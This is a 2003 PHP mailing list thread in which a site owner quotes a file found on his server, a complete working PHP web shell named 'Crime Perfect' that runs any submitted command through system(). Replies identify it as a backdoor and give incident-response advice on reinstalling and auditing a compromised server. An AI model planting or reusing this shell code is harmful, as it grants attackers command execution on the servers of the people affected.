Re: [PHP] Possible My Website was hacked... with PHP... please tellme what this is???
Looks like it is a PHP script to give people shell access as the web
server user.
On Thu, 2003-07-31 at 02:06, Joe Harman wrote:
I found this on my server... I have no idea what it is... can someone
tell me what it does...
Thanks
--
html head
titlePHP Shell - CP/title
/head
body bgcolor=#FF text=#33 link=#00 vlink=#00
alink=#00
h1 align=centerfont size=+4 face=verdanaCrime
Perfect/fontbr
font face=Tahoma size=+1PHP Shell - by _m4st3r_c0d3/font/h1
?php
/* First we check if there has been asked for a working directory. */
if (isset($work_dir)) {
/* A workdir has been asked for - we chdir to that dir. */
chdir($work_dir);
$work_dir = exec(pwd);
} else {
/* No work_dir - we chdir to $DOCUMENT_ROOT */
chdir($DOCUMENT_ROOT);
$work_dir = $DOCUMENT_ROOT;
}
?
form name=myform action=?php echo $PHP_SELF ? method=post
pbDiretoacute;rio em que vocecirc; estaacute; no momento:
?php
$work_dir_splitted = explode(/, substr($work_dir, 1));
echo a href=\$PHP_SELF?work_dir= . urlencode($url) . /command= .
urlencode($command) . \Root/a/;
if ($work_dir_splitted[0] == ) {
$work_dir = /; /* Root directory. */
} else {
for ($i = 0; $i count($work_dir_splitted); $i++) {
/* echo i = $i;*/
$url .= /.$work_dir_splitted[$i];
echo a href=\$PHP_SELF?work_dir= . urlencode($url) . command= .
urlencode($command) . \$work_dir_splitted[$i]/a/;
}
}
?
/b/p
pbEscolha abaixo o diretoacute;rio em que deseja ir:/b/p
select name=work_dir onChange=this.form.submit()
?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == .) {
echo option value=\$work_dir\ selectedCurrent
Directory/option\n;
} elseif ($dir == ..) {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / */
} elseif (strrpos($work_dir, /) == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo option value=\/\Parent Directory/option\n;
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo option value=\. strrev(substr(strstr(strrev($work_dir), /),
1)) .\Parent Directory/option\n;
}
} else {
if ($work_dir == /) {
echo option value=\$work_dir$dir\$dir/option\n;
} else {
echo option value=\$work_dir/$dir\$dir/option\n;
}
}
}
}
closedir($dir_handle);
?
/select
pbDigite abaixo os comandos que deseja executar:/b/p
input type=text name=command size=60 ?php if ($command) { echo
value=\$command\;} ? input name=submit_btn type=submit
value=Execute Command/p
pLigar/Ativar codestderr/code-trapping?
input type=checkbox name=stderr/p
pbAbaixo, terminal onde apareceraacute; os resultados dos comandos
que
vocecirc; executou/b/p
p
textarea cols=80 rows=20 readonly
?php
if ($command) {
if ($stderr) {
system($command . 1 /tmp/output.txt 21; cat /tmp/output.txt; rm
/tmp/output.txt);
} else {
system($command);
}
}
?
/textarea
/p
/form
pbCrime Perfect 2003 /b/p
pbBy _m4st3r_c0d3 - #crimeperfect/b/p
/div
/body
/html
Joe Harman
http://www.HarmanMedia.com
Only two things are infinite, the universe and human stupidity, and I'm
not sure about the former. - Albert Einstein
--
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
John Coggeshall http://www.coggeshall.org/
john at coggeshall dot org
The PHP Developer's Handbook
The definitive PHP5 developer's guide http://www.php-handbook.com/
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Possible My Website was hacked... with PHP... please tellme what this is???
trolling! ha binc2 wrote: Hi guys what does trolling mean? Never heard of it before. Angelo -Original Message- From: Joel Rees [EMAIL PROTECTED] To: Joe Harman [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 31 Jul 2003 16:10:24 +0900 Subject: Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is??? Assuming you are not just trolling, Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Don't count on it. They only deface servers they don't want to use. ... everyone can execute shell commands via system(); on your server. - delete the script ;) Oh, by all means, delete it if you want. But it's not the hole it came in through, and it's not the real backdoor. It's so blatent, I'd guess it's a script kiddy or a decoy. Even if it's a script kiddy, you _want_ to know how it got on the box. I'd take the box offline, back up all the data and configuration files, and re-install the whole system and all programs from scratch. Go over every configuration file with a fine-tooth comb. If the machine is on a subnet and I controlled the subnet, I think I'd take the whole subnet down, including the firewall, and clean every machine up, not putting any machine back on the subnet until it was clean and any holes patched. If I didn't control the subnet, I'd make sure the persons who did know there had been a break-in. And if you have any valuable data, consider it to have been stolen. If you have credit card numbers, report the possibility of theft to the credit card companies. Etc. If you're trolling, go away. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
